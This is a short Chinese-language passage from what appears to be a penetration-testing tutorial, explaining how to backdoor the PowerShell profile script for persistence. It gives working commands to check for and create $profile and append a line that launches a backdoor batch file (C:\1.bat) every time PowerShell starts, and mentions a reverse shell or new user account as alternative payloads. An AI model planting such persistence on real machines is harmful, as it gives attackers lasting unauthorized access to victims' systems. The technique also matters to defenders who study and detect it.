参考:https://zhuanlan.zhihu.com/p/401733128
0x05 powershell配置文件后门
Powershell配置文件其实就是一个powershell脚本,他可以在每次运行powershell的时候自动运行,所以可以通过向该文件写入自定义的语句用来长期维持权限。
依次输入以下命令,查看当前是否存在配置文件。
echo $profile
Test-path $profile
如果返回false则需要创建一个
New-Item -Path $profile -Type File –Force
然后写入命令,这里我以创建一个用户为目标,也可以写成反弹shell的,因为之前测试过程中写入过数据,所以这里我是三条内容。
这里的C:\1.bat是我的后门文件位置,实战情况下,各位需要按照实际文件路径来修改
$string = 'Start-Process "C:\1.bat"'
$string | Out-File -FilePath $profile -Append
more $profile
然后再次打开powershell便会触发。